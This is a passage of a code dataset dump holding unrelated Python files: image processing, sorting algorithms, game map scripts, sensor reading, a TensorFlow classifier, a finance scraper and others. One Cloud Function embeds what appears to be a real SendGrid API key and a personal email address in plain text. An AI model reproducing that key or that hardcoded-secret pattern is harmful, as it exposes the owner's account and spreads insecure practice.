Image.open('../data/leo_ratner.jpg')\ns = im.tostring() # convert PIL image -> string\n\n# convert string -> numerix array of floats\nrgb = fromstring(s, UInt8).astype(Float)/255.0 \n\n# resize to RGB array\nrgb = resize(rgb, (im.size[1], im.size[0], 3))\n\nimshow(rgb, interpolation='nearest')\naxis('off') # don't display the image axis\nshow()\n","sub_path":"trunk/users_guide/code/from_pil.py","file_name":"from_pil.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188000258","text":"\"\"\"\n{\n \"name\": \"projects/prouno/locations/europe-west1/functions/function-email\",\n \"description\": \"Function for send email.\",\n \"entryPoint\": \"send_email\",\n \"runtime\": \"python37\"\n \"timeout\": \"60s\",\n \"availableMemoryMb\": 256,\n \"serviceAccountEmail\": \"prouno@appspot.gserviceaccount.com\",\n \"ingressSettings\": \"ALLOW_ALL\",\n \"sourceUploadUrl\": string\n \"eventTrigger\": {\n \"eventType\": \"google.pubsub.topic.publish\",\n \"resource\": \"projects/prouno/topics/report_email\",\n \"service\": \"pubsub.googleapis.com\",\n \"failurePolicy\": {}\n }\n}\n\"\"\"\n\n\ndef send_email(data, context):\n import sendgrid\n import base64\n from sendgrid.helpers.mail import Email, To, Content, Mail\n\n SENDGRID_API_KEY = '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'\n sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY)\n\n msg = base64.b64decode(data[\"data\"]).decode(\"utf-8\")\n # context info from pubsub\n\n from_email = Email(\"mrc.malagoli@gmail.com\")\n to_email = To(\"mrc.malagoli@gmail.com\")\n subject = \"LogNext Report\"\n content = Content(\"text/plain\", msg)\n mail = Mail(from_email, to_email, subject, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n\n return\n","sub_path":"functions/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"190779669","text":"import App\n\ndef Initialize():\n\t# Create the set (\"KavisAlpha2\")\n\tpSet = App.SetClass_Create()\n\tApp.g_kSetManager.AddSet(pSet, \"KavisAlpha2\")\n\n\t# Save the name of the region file that's creating the set.\n\tpSet.SetRegionModule(\"Systems.KavisAlpha.KavisAlpha2\")\n\n\t# Activate the proximity manager for our set.\n\tpSet.SetProximityManagerActive(1)\n\n\t# Load the placements and backdrops for this set.\n\tLoadPlacements(\"KavisAlpha2\")\n\tLoadBackdrops(pSet)\n\n\t#Load and place the grid.\n\tpGrid = App.GridClass_Create()\n\tpSet.AddObjectToSet(pGrid, \"grid\")\n\tpGrid.SetHidden(1)\n\n\t# Create static objects for this set:\n\t# If you want to create static objects for this region, make a\n\t# \"KavisAlpha2_S.py\" file with an Initialize function that creates them.\n\ttry:\n\t\timport KavisAlpha2_S\n\t\tKavisAlpha2_S.Initialize(pSet)\n\texcept ImportError:\n\t\t# Couldn't find the file. That's ok. Do nothing...\n\t\tpass\n\n\t# Done.\n\ndef GetSetName():\n\treturn \"KavisAlpha2\"\n\ndef GetSet():\n\treturn App.g_kSetManager.GetSet(\"KavisAlpha2\")\n\ndef Terminate():\n\tApp.g_kSetManager.DeleteSet(\"KavisAlpha2\")\n\ndef LoadPlacements(sSetName):\n\t# Light position \"Ambient Light\"\n\tkThis = App.LightPlacement_Create(\"Ambient Light\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.ConfigAmbientLight(1.000000, 0.700000, 0.700000, 0.100000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Ambient Light\"\n\n\t# Light position \"Directional Light\"\n\tkThis = App.LightPlacement_Create(\"Directional Light\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(-0.044018, 0.572347, 0.029146)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.076971, 0.995795, 0.049677)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.006759, -0.050345, 0.998709)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.ConfigDirectionalLight(1.000000, 0.700000, 0.700000, 0.8)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Directional Light\"\n\n\t# Position \"Sun\"\n\tkThis = App.Waypoint_Create(\"Sun\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, -425000.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun\"\n\n\t# Position \"Sun2\"\n\tkThis = App.Waypoint_Create(\"Sun2\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(-17500.000000, -250000.000000, 4000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun2\"\n\n\t# Position \"Sun3\"\n\tkThis = App.Waypoint_Create(\"Sun3\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(17500.000000, 1700000.000000, -2000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun3\"\n\n\t# Position \"Kavis Beta\"\n\tkThis = App.Waypoint_Create(\"Kavis Beta\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(17500.000000, 1550000.000000, -2000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Beta\"\n\n\t# Position \"Kavis Nuetron Star - Accreation cloud\"\n\tkThis = App.Waypoint_Create(\"Kavis Nuetron Star - Accreation cloud\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(-43500.000000, -300000.000000, 4000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Nuetron Star - Accreation cloud\"\n\n\t# Position \"Kavis Alpha - Observation Point\"\n\tkThis = App.Waypoint_Create(\"Kavis Alpha - Observation Point\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(-5500.000000, -178000.000000, 1000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Alpha - Observation Point\"\n\n\t# Position \"Planet Location\"\n\tkThis = App.Waypoint_Create(\"Planet Location\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(1500.000000, -850.000000, -500.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Planet Location\"\n\n\t# Position \"Player Start\"\n\tkThis = App.Waypoint_Create(\"Player Start\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.080718, 0.000000, 0.996737)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Player Start\"\n\nimport App\n\ndef LoadBackdrops(pSet):\n\n\t#Draw order is implicit. First object gets drawn first\n\n\t# Star Sphere \"Backdrop stars\"\n\tkThis = App.StarSphere_Create()\n\tkThis.SetName(\"Backdrop stars\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.185766, 0.947862, -0.258938)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.049825, 0.254099, 0.965894)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/stars.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(1.000000)\n\tkThis.SetVerticalSpan(1.000000)\n\tkThis.SetSphereRadius(320.000000)\n\tkThis.SetTextureHTile(2.000000)\n\tkThis.SetTextureVTile(2.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop stars\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop stars\"\n\n\t# Backdrop Sphere \"Backdrop zmNebcustom3\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop zmNebcustom3\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(-0.302035, -0.953278, 0.005955)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(-0.008883, 0.009061, 0.999920)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/zmNebcustom3.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.164025)\n\tkThis.SetVerticalSpan(0.328050)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop zmNebcustom3\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop zmNebcustom3\"\n\n\t# Backdrop Sphere \"Backdrop zmNebcustom4\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop zmNebcustom4\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(-0.207927, -0.946019, 0.248624)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.061027, 0.241138, 0.968570)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/zmNebcustom4.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.111451)\n\tkThis.SetVerticalSpan(0.202638)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop zmNebcustom4\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop zmNebcustom4\"\n\n\t# Backdrop Sphere \"Backdrop treknebula7\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop treknebula7\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.245580, 0.964443, 0.097674)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.119808, -0.130184, 0.984225)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/treknebula7.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.230686)\n\tkThis.SetVerticalSpan(0.350137)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop treknebula7\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop treknebula7\"\n\n","sub_path":"scripts/Systems/KavisAlpha/KavisAlpha2.py","file_name":"KavisAlpha2.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24807565","text":"\r\n\"\"\"\r\nCreated on Fri Aug 28 17:19:20 2020\r\n\r\n@author: jadin\r\n\r\nsalt and pepper noise can be handled by efficiently by median filter \r\nit is low pass filter\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\npath = \"C:\\\\Users\\\\jadin\\\\Downloads\\\\misc\\\\misc\\\\\"\r\n\r\npath1 = path+\"4.2.07.tiff\"\r\n\r\nimg= cv2.imread(path1,1)\r\n\r\nimg =cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\nrows,columns,channels = img.shape\r\np =0.1\r\noutput = np.zeros(img.shape,np.uint8)\r\n\r\nfor i in range (rows):\r\n for j in range (columns):\r\n r = random.random()\r\n if r

lista[i + 1]:\n temp = lista[i]\n lista[i] = lista[i + 1]\n lista[i + 1] = temp\n return lista\n\n \"\"\"Algoritmo de ordenamiento por seleccion\"\"\"\n def seleccion(self, lista):\n \"\"\"\n :param lista: lista introducida\n :return: lista ordenada\n \"\"\"\n tamanio = len(lista)\n for i in range(tamanio - 1):\n for j in range(i + 1, tamanio):\n if lista[i] > lista[j]:\n lista[i], lista[j] = lista[j], lista[i]\n return lista\n\n \"\"\"Algoritmo de ordenamiento Radix\"\"\"\n def radixSort(self, lista):\n \"\"\"\n :param lista: lista introducida\n :return: lista ordenada\n \"\"\"\n RADIX = 10\n maxLength = False\n tmp, placement = -1, 1\n\n while not maxLength:\n maxLength = True\n cubos = [list() for _ in range(RADIX)]\n for i in lista:\n tmp = i // placement\n cubos[tmp % RADIX].append(i)\n if maxLength and tmp > 0:\n maxLength = False\n\n a = 0\n for b in range(RADIX):\n salto = cubos[b]\n for i in salto:\n lista[a] = i\n a += 1\n placement *= RADIX\n return lista\n\n \"\"\"Algoritmo de ordenamiento QuickSort\"\"\"\n def quickSort(self, lista):\n \"\"\"\n :param lista: lista introducida\n :return: lista ordenada\n \"\"\"\n if (len(lista) <= 1):\n return lista\n\n pivot = lista[len(lista) // 2]\n\n lt = [i for i in lista if i < pivot]\n eq = [pivot] * lista.count(pivot)\n gt = [i for i in lista if i > pivot]\n lista = self.quickSort(lt) + eq + self.quickSort(gt)\n return lista\n\n \"\"\"Algoritmo de ordenamiento MergeSort\"\"\"\n def mergeSort(self, lista):\n \"\"\"\n :param lista: lista introducida\n :return: lista ordenada\n \"\"\"\n if len(lista) > 1:\n medio = len(lista) // 2\n izquierda = lista[:medio]\n derecha = lista[medio:]\n self.mergeSort(izquierda)\n self.mergeSort(derecha)\n i = 0\n j = 0\n k = 0\n while i < len(izquierda) and j < len(derecha):\n if izquierda[i] <= derecha[j]:\n lista[k] = izquierda[i]\n i += 1\n else:\n lista[k] = derecha[j]\n j += 1\n k += 1\n while i < len(izquierda):\n lista[k] = izquierda[i]\n i += 1\n k += 1\n while j < len(derecha):\n lista[k] = derecha[j]\n j += 1\n k += 1\n return lista\n","sub_path":"src/main/python/co/edu/unbosque/model/AgoritmoDeOrdenamiento.py","file_name":"AgoritmoDeOrdenamiento.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"47253728","text":"import machine, ssd1306, dht\nfrom time import sleep\n\n#OLED\ni2c = machine.I2C(scl=machine.Pin(4), sda=machine.Pin(5))\noled = ssd1306.SSD1306_I2C(128, 64, i2c)\n\n#DHT\nsensor = dht.DHT22(machine.Pin(0))\n#sensor = dht.DHT11(Pin(14))\n\n#DHT logic\nwhile True:\n try:\n sleep(2)\n sensor.measure()\n temp = sensor.temperature()\n hum = sensor.humidity()\n temp_f = temp * (9/5) + 32.0\n print('Temperature: %3.1f C' %temp)\n #print('Temperature: %3.1f F' %temp_f)\n print('Humidity: %3.1f %%' %hum)\n print()\n oled.fill(0)\n oled.text('Temp: %3.1f C' %temp, 20, 20)\n oled.text('Humi: %3.1f %%' %hum, 20, 40)\n oled.show()\n except OSError as e:\n print('Failed to read sensor.')\n\n\n#OLED display info text\n#fill 0 (black), fill 1 (white)\n#oled.fill(1)\n#last number belowe (0 or 1 i otional, 0 is black, 1 i white font\n#oled.text('Hello, World 1!', 0, 0, 0)\n#oled.show()\n\n\n\n","sub_path":"MicroPython/ESP32/oled/DHT_ssd1306.py","file_name":"DHT_ssd1306.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377182650","text":"'Credit : Mohit Singh'\n\n#Import necessary libraries\nfrom scipy.spatial import distance\nfrom imutils import face_utils\nimport numpy as np\nimport time\nimport dlib\nimport cv2\nimport threading\nfrom SerialFinal import distanceUs1, moveLinear\nfrom multiprocessing import Process , Pipe\nimport threading\nimport queue\nfrom num2words import num2words\nimport subprocess as sp\n\n\n\n\n\n\ndef camera(yVal):\n count = 1\n countsp = 0\n leftEyeSend,leftEyeRecv = Pipe()\n \n p1 = Process(target = condEye, args=(yVal, leftEyeRecv))\n p1.start()\n \n #Load face detector and predictor, uses dlib shape predictor file\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n #Extract indexes of facial landmarks for the left and right eye\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS['left_eye']\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS['right_eye']\n\n #Start webcam video capture\n video_capture = cv2.VideoCapture(0)\n \n try:\n while True:\n \n #Read each frame and flip it, and convert to grayscale\n ret, frame = video_capture.read()\n frame = cv2.flip(frame,1)\n frame = cv2.resize(frame, (300, 240))\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n \n faces = detector(gray, 0)\n \n\n\n #making reference lines\n frame = cv2.line(frame, (0,yVal-40),(1279,yVal-40),(0,0,255),2)\n frame = cv2.line(frame, (0,yVal),(1279,yVal),(0,0,255),2)\n \n #Show video feed\n cv2.imshow('EYE_DETECTION',frame )\n \n if len(faces) == 0:\n print(\"Faceless\")\n \n if count == 20:\n print('count>>20')\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/noPeople.wav 2>/dev/null\"], shell=True)\n leftEyeSend.close()\n p1.terminate()\n time.sleep(0.1)\n return ''\n else:\n count +=1\n moveLinear('stop')\n continue\n \n \n\n if len(faces) > 1:\n print('there are more than one person in the camera')\n moveLinear('stop')\n if countsp == 0:\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/morePeople.wav 2>/dev/null\"], shell=True)\n countsp +=1\n continue\n\n\n shape = predictor(gray, faces[0])\n shape = face_utils.shape_to_np(shape)\n\n #Get array of coordinates of leftEye and rightEye\n leftEye = shape[lStart:lEnd]\n \n leftEyeSend.send(leftEye[0][1])\n count = 1\n countsp = 0\n \n# if not p1.is_alive():\n# leftEyeSend.close()\n# # p1.terminate()\n# time.sleep(0.1)\n# cv2.destroyAllWindows()\n# print('p1 is terminated')\n# return ''\n \n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n p1.terminate()\n time.sleep(0.1)\n cv2.destroyAllWindows()\n return\n \n \n except KeyboardInterrupt:\n moveLinear('stop')\n leftEyeSend.close()\n p1.terminate()\n time.sleep(0.1)\n video_capture.release()\n cv2.destroyAllWindows()\n return\n \n \n \ndef condEye(yVal,left):\n \n \n cond = ''\n countDone = 0\n countUp = 0\n countDown = 0\n while True:\n test = left.recv()\n\n if test >= yVal-30 and test <= yVal-10:\n cond = 'stop'\n moveLinear(cond)\n print(\"Good position\")\n countDone+=1\n countDown = 0\n countUp = 0\n if countDone == 10: \n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/DoneMove.wav 2>/dev/null\"], shell=True)\n \n \n elif test < yVal-40:\n cond = 'up'\n moveLinear(cond)\n print(\"Table is moving up\")\n countDone = 0\n countDown = 0\n countUp += 1\n\n if countUp==10:\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/Up.wav 2>/dev/null\"], shell=True)\n# \n \n elif test > yVal:\n cond = 'down'\n moveLinear(cond)\n print(\"Table is moving down\")\n countDone = 0\n countUp = 0\n countDown += 1\n if countDown == 10:\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/Down.wav 2>/dev/null\"], shell=True)\n \n \n \n \n \n \nif __name__ == '__main__':\n\n y = distanceUs1()\n x = camera(y)\n \n while x == '':\n cv2.destroyAllWindows()\n time.sleep(3)\n \n x = camera(distanceUs1())\n ","sub_path":"ProjectFinal.py","file_name":"ProjectFinal.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236521708","text":"#Malik Abu-Kalokoh,\n\nimport os\nimport sys\n#Savng all outputs and redirecting to surpress unneeded output\nstderr = sys.stderr\nsys.stderr = open('/dev/null', 'w')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nsys.stderr = stderr\nnp.random.seed(42)\n\nfilename = sys.argv[1] #Should be file for breast cancer\n\nnames = ['Sample code number','Clump Thickness', 'Uniformity of Cell Size',\n 'Uniformity of Cell Shape', 'Marginal Adhesion',\n 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin',\n 'Normal Nucleoli', 'Mitoses', 'Class']\n\ndataset = pd.read_csv(filename, names=names,keep_default_na=True, na_values='?')\n\n#Remove messed up data\ndel dataset['Sample code number']\ndataset.dropna(inplace=True)\n\noutput = dataset['Class']\n#One Hot Encoding\noutput = pd.get_dummies(output, columns=['Class'])\ndel dataset['Class']\nX = dataset\ndel dataset\nY = output\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1)\n\n# Parameters\nlearning_rate = 0.1\nnum_steps = 2000\nbatch_size = 128\ndisplay_step = 100\n\n# Network Parameters\nn_hidden_1 = 15\nn_hidden_2 = 14\nn_hidden_3 = 13\nn_hidden_4 = 12\nnum_input = len(list(X))\nnum_classes = len(list(Y))\n\ninit = tf.global_variables_initializer()\n\n# tf Graph input\nX = tf.placeholder(\"float\", [None, num_input])\nY = tf.placeholder(\"float\", [None, num_classes])\n\nweights = {\n 'h1': tf.Variable(tf.random_normal([num_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n 'h4': tf.Variable(tf.random_normal([n_hidden_3, n_hidden_4])),\n 'out': tf.Variable(tf.random_normal([n_hidden_4, num_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'b3': tf.Variable(tf.random_normal([n_hidden_3])),\n 'b4': tf.Variable(tf.random_normal([n_hidden_4])),\n 'out': tf.Variable(tf.random_normal([num_classes]))\n}\n\n# Create model\ndef neural_net(x):\n out1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n out1 = tf.nn.relu(out1)\n out2 = tf.add(tf.matmul(out1, weights['h2']), biases['b2'])\n out2 = tf.nn.relu(out2)\n out3 = tf.layers.dense(out2, 2)\n\n return out3\n\n# Construct model\nlogits = neural_net(X)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n# Evaluate model (with test logits, for dropout to be disabled)\ncorrect_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(Y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initialize the variables (i.e. assign their default value)\ninit = tf.global_variables_initializer()\n\n# Start training\nwith tf.Session() as sess:\n sess.run(init)\n\n for step in range(1, num_steps+1):\n training = pd.concat([X_train,Y_train],axis=1).sample(batch_size)\n batch_x = pd.DataFrame(training,columns=list(X_train))\n batch_y = pd.DataFrame(training,columns=list(Y_train))\n # Run optimization op (backprop)\n sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})\n if step % display_step == 0 or step == 1:\n # Calculate batch loss and accuracy\n loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x,\n Y: batch_y})\n print(\"Step \" + str(step) + \", Minibatch Loss= \" + \\\n \"{:.4f}\".format(loss) + \", Training Accuracy= \" + \\\n \"{:.3f}\".format(acc))\n\n print(\"Optimization Finished!\")\n\n # Calculate accuracy for MNIST test images\n t_data = X_test\n t_results = Y_test\n print(\"Testing Accuracy:\",\n sess.run(accuracy, feed_dict={X: t_data,\n Y: t_results}))\n","sub_path":"Homework_3/HW3_malik18_1.py","file_name":"HW3_malik18_1.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184169623","text":"# -*- coding: utf-8 -*-\nfrom spider import *\nfrom setting import *\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\n\ndef getNewsItem(url):\n pass\n\ndef getIndices():\n baseUrl = 'https://uk.finance.yahoo.com/intlindices?e='\n e = ['europe','us','asia','americas','africa']\n IndicesDriver = webdriver.PhantomJS(executable_path='/Users/guti/phantomjs-2.1.1-macosx/bin/phantomjs')\n ComponentsDriver = webdriver.PhantomJS(executable_path='/Users/guti/phantomjs-2.1.1-macosx/bin/phantomjs')\n for each in e:\n url = baseUrl+each\n IndicesDriver.get(url)\n elem = IndicesDriver.find_elements_by_xpath('//div[@id=\"yfitp\"]/table/tbody/tr')\n for i in elem:\n symbol = i.find_element_by_xpath('./td[@class=\"first\"]/span/a').text\n name = i.find_element_by_xpath('./td[@class=\"second name\"]').text\n stocklist = []\n tdLast = i.find_elements_by_xpath('./td[@class=\"last\"]/a')\n if len(tdLast) == 3:\n link = tdLast[0].get_attribute('href')\n page = 0\n while True:\n try:\n ComponentsDriver.get(link+'&c=%s'%page)\n stockElement = ComponentsDriver.find_elements_by_xpath('//tbody/tr/td/b/a')\n if len(stockElement)==0:\n break\n for j in stockElement:\n stocklist.append(j.text)\n page += 1\n except:\n break\n res = {}\n res['symbol'] = symbol\n res['name'] = name\n res['stockList'] = stocklist\n res['region'] = each\n print(res)\n\n\n ComponentsDriver.close()\n IndicesDriver.close()\n\n\n\n\n\n\n\n\n\n\n\nclass yahooFinanceSpider(spider):\n def __init__(self):\n spider.__init__(self)\n self.changeCollection('yahooNews')\n\n def getNewsList(self):\n\n url = 'https://uk.finance.yahoo.com/news/index/'\n try:\n response = self.session.get(url,headers = DEFAULT_REQUEST_HEADERS)\n except:\n print(\"session get error\")\n if response.ok:\n selector = etree.HTML(response.text)\n\n else:\n print(response.status_code)\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n # y = yahooFinanceSpider()\n # y.getNewsList()\n getIndices()","sub_path":"crawl/yahooFinanceSpider.py","file_name":"yahooFinanceSpider.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286816000","text":"import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"blue\")\n\n\ndef set_brad():\n brad = turtle.Turtle(\"turtle\")\n brad.shape(\"turtle\")\n brad.color(\"red\")\n brad.speed(56)\n return brad\n\n\ndef draw_square(who):\n while(True):\n for i in range(0, 4):\n who.forward(100)\n who.right(90)\n 